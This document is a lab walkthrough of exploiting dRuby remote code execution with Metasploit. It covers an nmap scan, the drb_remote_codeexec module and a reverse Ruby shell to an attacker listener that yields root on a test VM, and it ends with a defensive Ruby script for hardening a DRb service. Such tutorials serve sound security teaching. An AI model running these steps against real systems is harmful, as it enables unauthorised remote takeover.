Metasploit Remote Code Execution Against Distributed Ruby

    In everyday life, developers and users fall into similar operating habits, and those habits are often the easiest thing for an attacker to use as a way into a target.
    Whenever we build a product, we weigh convenience against security.
    Distributed Ruby systems show the same pattern, which is why Metasploit can test them with very little effort.

    What is Distributed Ruby?

    What is distributed computing? When a single computer lacks the computing power for a task and a supercomputer is not available,
    several computers are combined and the computation and data are spread across each machine, achieving a supercomputer-like effect.
    Distributed Ruby (dRuby, DRb) is the distributed object system for the Ruby programming language; it allows remote method invocation between Ruby processes.
    While the technology can extend certain programs with flexible services, it becomes a security vulnerability when it is not implemented correctly, since any method name a client sends is dispatched to the object the service exposes.

    0x01 Test environment

    For this demonstration both the attacking machine and the target run Parrot Security OS.
    IP: 172.16.1.102
    Ruby version: ruby 2.0.0p648 (2015-12-16) [x86_64-linux]

    0x02 Verifying the vulnerability

    Run dRuby on the target. When dRuby is first set up it binds itself to a specific URI and port;
    for today's demonstration the port is 8787, so that Nmap can scan it properly.
    Use nmap -sV ip -p 8787 to fingerprint the version of the software listening on the target host at port 8787.

    nmap -sV 172.16.1.102 -p 8787
    
    [*] exec: nmap -sV 172.16.1.102 -p 8787
    
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
    Nmap scan report for 172.16.1.102
    Host is up (0.0013s latency).
    
    PORT     STATE SERVICE VERSION
    8787/tcp open  drb     Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
    MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
    

    We can see that the dRuby service is present and running. Next we bring out Metasploit to exploit it.

    0x03 Exploitation

    Type msfconsole in a terminal to start Metasploit, then run search drb to list any matching modules. Output:

    msf > search drb
    
    Matching Modules
    ================
    
       Name                                                   Disclosure Date  Rank       Check  Description
       ----                                                   ---------------  ----       -----  -----------
       exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  No     Distributed Ruby Remote Code Execution
       exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
       exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
    

    We can see that drb_remote_codeexec is the module we are looking for. Load it with the use command followed by the module path.

    msf > use exploit/linux/misc/drb_remote_codeexec
    
    msf exploit(linux/misc/drb_remote_codeexec) > info
    
           Name: Distributed Ruby Remote Code Execution
         Module: exploit/linux/misc/drb_remote_codeexec
       Platform: Unix
           Arch: cmd
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-03-23
    
    Provided by:
      joernchen <joernchen@phenoelit.de>
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Trap
      2   Eval
      3   Syscall
    
    Check supported:
      No
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   no        The target address
      RPORT  8787             yes       The target port
      URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
    
    Payload information:
      Space: 32768
    
    Description:
      This module exploits remote code execution vulnerabilities in dRuby.
    
    References:
      CVE: Not available
      http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
      http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
      http://bugkraut.de/posts/tainting
    

    0x04 Launching the exploit

    Set the target IP and port.

    msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
    
    rhost => 172.16.1.102
    
    msf exploit(linux/misc/drb_remote_codeexec) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                Disclosure Date  Rank    Check  Description
       ----                                ---------------  ----    -----  -----------
       cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
       cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
       cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
       cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
       cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
       cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
       cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
       cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
       cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
       cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
       cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
       cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
       cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
       cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
       cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
       cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
       cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
       cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
       cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
       cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
       cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
       cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
       cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
       cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
       cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
       cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
       cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
       cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
       cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
       cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
       cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
       cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
       cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
       cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
       generic/custom                                       normal  No     Custom Payload
       generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
    

    We choose cmd/unix/reverse_ruby.

    msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
    
    payload => cmd/unix/reverse_ruby
    
    msf exploit(linux/misc/drb_remote_codeexec) > options
    
    Module options (exploit/linux/misc/drb_remote_codeexec):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  172.16.1.102     no        The target address
       RPORT  8787             yes       The target port
       URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
    
    Payload options (cmd/unix/reverse_ruby):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    

    Set the listener address.

    msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100
    
    lhost => 172.16.1.100
    

    0x05 Getting a shell

    Simply run it:

    msf exploit(linux/misc/drb_remote_codeexec) > run
    
    [*] Started reverse TCP handler on 172.16.1.100:4444
    [*] Trying to exploit instance_eval method
    [!] Target is not vulnerable to instance_eval method
    [*] Trying to exploit syscall method
    [*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
    [+] Deleted .JU4AK4Gh3sOBkaB7
    
    whoami
    root
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    ip address
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
        inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
        inet6 fe80::a00:27ff:fe77:626c/64 scope link
           valid_lft forever preferred_lft forever
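    The run above shows what happens when the exposed object accepts whatever method name it receives: the module tries instance_eval first, then syscall. The following Ruby script is an added example, not code from the original post or from the dRuby project, and shows the server-side controls a defender has: bind to loopback only, install a DRb ACL, and make the eval-style public methods of the front object private so that DRb's own dispatcher rejects them; it then probes the service the way a client call reaches the server and records the answers. StatusFront, start_hardened_service, probe and run_demo are names invented for this example; the ACL and the private-method check are DRb's own features.

```ruby
require 'drb'
require 'drb/acl'

# Front object of a hypothetical status service (constructed for this
# example): one intended method, and the eval-style public methods every
# Ruby object inherits made private, because DRb's dispatcher refuses to
# call a method that is private on the front object.
class StatusFront
  def status
    { service: 'status', healthy: true }
  end

  # instance_eval, instance_exec, send, public_send, extend and
  # define_singleton_method are public on every Object; left exposed, any
  # client that can reach the port can run arbitrary Ruby in this process.
  private :instance_eval, :instance_exec, :send, :public_send,
          :extend, :define_singleton_method
end

# Bind to loopback only and install an ACL that rejects every non-loopback
# client. The ACL must be installed before the service starts.
def start_hardened_service
  DRb.install_acl(ACL.new(%w[deny all allow 127.0.0.1]))
  DRb.start_service('druby://127.0.0.1:0', StatusFront.new)
  DRb.uri
end

# Request a method by name the way a client call reaches the server, via
# DRbObject#method_missing (DRbObject defines instance_eval itself, so a
# plain remote.instance_eval would run on the proxy, not on the server).
# Returns the result, or the class of the exception the server raised.
def probe(uri, msg_id, *args)
  DRbObject.new_with_uri(uri).__send__(:method_missing, msg_id, *args)
rescue StandardError, SecurityError => e
  e.class
end

def run_demo
  uri = start_hardened_service
  results = {
    status:        probe(uri, :status),
    instance_eval: probe(uri, :instance_eval, '1 + 1'),
    send:          probe(uri, :send, :instance_eval, '1 + 1'),
    dunder_send:   probe(uri, :__send__, :instance_eval, '1 + 1'),
    system:        probe(uri, :system, 'true')
  }
  DRb.stop_service
  results
end
```

    run_demo returns a hash in which the status call succeeds, instance_eval, send and system come back as NoMethodError, and __send__ comes back as SecurityError from DRb's built-in insecure-method check.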
    
